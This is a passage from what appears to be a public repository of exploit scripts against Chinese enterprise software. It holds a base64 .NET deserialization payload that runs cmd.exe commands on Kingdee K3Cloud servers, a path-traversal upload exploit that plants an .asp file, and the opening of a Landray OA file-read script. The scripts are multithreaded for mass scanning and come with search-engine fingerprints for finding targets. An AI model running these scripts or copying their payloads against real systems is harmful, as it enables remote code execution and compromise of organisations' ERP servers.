AAAAAAAAAABABkAAAAAAAQAAAAAAAAAAAAAABMAnQAAAAAABAAAAAAAAAAAAAAAAQAiAAAAAAAAAAA8TW9kdWxlPgB6NHJkYzNkMy5kbGwARQBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AC5jdG9yAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQB6NHJkYzNkMwBTeXN0ZW0uV2ViAEh0dHBDb250ZXh0AGdldF9DdXJyZW50AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAQ2xlYXJFcnJvcgBIdHRwUmVzcG9uc2UAZ2V0X1Jlc3BvbnNlAENsZWFyAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFByb2Nlc3NTdGFydEluZm8AZ2V0X1N0YXJ0SW5mbwBzZXRfRmlsZU5hbWUASHR0cFJlcXVlc3QAZ2V0X1JlcXVlc3QAU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkAE5hbWVWYWx1ZUNvbGxlY3Rpb24AZ2V0X0hlYWRlcnMAZ2V0X0l0ZW0AU3RyaW5nAENvbmNhdABzZXRfQXJndW1lbnRzAHNldF9SZWRpcmVjdFN0YW5kYXJkT3V0cHV0AHNldF9SZWRpcmVjdFN0YW5kYXJkRXJyb3IAc2V0X1VzZVNoZWxsRXhlY3V0ZQBTdGFydABTeXN0ZW0uSU8AU3RyZWFtUmVhZGVyAGdldF9TdGFuZGFyZE91dHB1dABUZXh0UmVhZGVyAFJlYWRUb0VuZABXcml0ZQBGbHVzaABFbmQARXhjZXB0aW9uAAAAD2MAbQBkAC4AZQB4AGUAAAdjAG0AZAAABy8AYwAgAAAAAAAP88h5XG19R4TzyRIXxuELAAi3elxWGTTgiQMgAAEEIAEBCAiwP19/EdUKOgQAABIRBCAAEhUEIAASGQQgABIhBCABAQ4EIAASJQQgABIpBCABDg4FAAIODg4EIAEBAgMgAAIEIAASMQMgAA4IBwQSERIdDg4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAAuCYAAAAAAAAAAAAAziYAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAmAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAATAIAAAAAAAAAAAAATAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAwAC4AMAAuADAALgAwAAAAPAANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAAB6ADQAcgBkAGMAMwBkADMALgBkAGwAbAAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAEQADQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAAB6ADQAcgBkAGMAMwBkADMALgBkAGwAbAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAADgNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDwAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEIBiEAAAD+AVN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=",
40 |             "format": "3"
41 |         }'''
42 |     vulurl = "http://"+url + "/k3cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc"
43 |     try:
44 |         r = requests.post(vulurl, headers=headers,data=data,proxies=proxysdata)
45 |         print(r.text)
46 |         if r.status_code==200 and "authority\system" in r.text :
47 |             print("http://"+host+":true whoami:"+r.text[0:20])
48 |         else:
49 |             return 0
50 |             print (host+":false")
51 |     except:
52 |         print (host+":false")
53 | 
54 | 
55 | if __name__ == '__main__':
56 |     file = sys.argv[1]
57 |     data = open(file)
58 |     reader = csv.reader(data)
59 |     with ThreadPoolExecutor(50) as pool:
60 |         for row in reader:
61 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Kingdee_ScpSupRegHandler_Upload_File_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa：icon_hash="-1629133697"
 6 | # zoomeye:app:"金蝶云星空
 7 | 
 8 | 
 9 | import sys
10 | import requests
11 | import csv
12 | import urllib3
13 | import hashlib
14 | from concurrent.futures import ThreadPoolExecutor
15 | urllib3.disable_warnings()
16 | if len(sys.argv) != 2:
17 |     print(
18 |         '+----------------------------------------------------------------------------------------------------------+')
19 |     print(
20 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
21 |     print(
22 |         '+----------------------------------------------------------------------------------------------------------+')
23 |     print(
24 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
25 |     print(
26 |         '+ EXP: python3 Kingdee_ScpSupRegHandler_Upload_File_Poc.py url.txt                                         +')
27 |     print(
28 |         '+----------------------------------------------------------------------------------------------------------+')
29 |     sys.exit()
30 | proxysdata = {
31 | 'http': '127.0.0.1:8080'
32 | }  
33 | def exp(host):
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers = {
41 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
42 |         "Content-Type": "multipart/form-data;boundary=fd18dd968b553715cbc5a1982526199b",
43 |         "Host": "%s" %host2
44 |     }
45 |     data ="""--fd18dd968b553715cbc5a1982526199b
46 | Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/6666666.asp."
47 | Content-Type: text/plain
48 | 
49 | <% Response.Write("6666666") %>
50 | --fd18dd968b553715cbc5a1982526199b
51 | Content-Disposition: form-data; name="FID"
52 | 
53 | 2022
54 | --fd18dd968b553715cbc5a1982526199b
55 | Content-Disposition: form-data; name="dbId_v"
56 | 
57 | .
58 | --fd18dd968b553715cbc5a1982526199b--
59 | """
60 |     vulurl = url + "/k3cloud/SRM/ScpSupRegHandler"
61 |     vulurl1 = url + "/K3Cloud/uploadfiles/6666666.asp"
62 |     
63 |     try:
64 |         r = requests.post(vulurl, headers=headers,data=data,verify=False)
65 |         if  "true" in r.text:
66 |             print(url+"存在上传接口")
67 |             #print("文件地址为:"+url+"/K3Cloud/uploadfiles/666666.asp")
68 |             r2=requests.get(vulurl1,headers=headers,verify=False)
69 |             if r2.status_code==200 and "6666666" in r2.text:
70 |                 print("文件地址为:"+url+"/K3Cloud/uploadfiles/6666666.asp")
71 |             #print("http://"+host+":true 文件地址为："+"")
72 |         else:
73 |             return 0
74 |             print (host+":false")
75 |     except:
76 |         return 0
77 |         print (host+":false")
78 | 
79 | 
80 | if __name__ == '__main__':
81 |     file = sys.argv[1]
82 |     data = open(file)
83 |     reader = csv.reader(data)
84 |     with ThreadPoolExecutor(50) as pool:
85 |         for row in reader:
86 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2023 MDSEC
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/Landray_Oa_Custom_FileRead_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
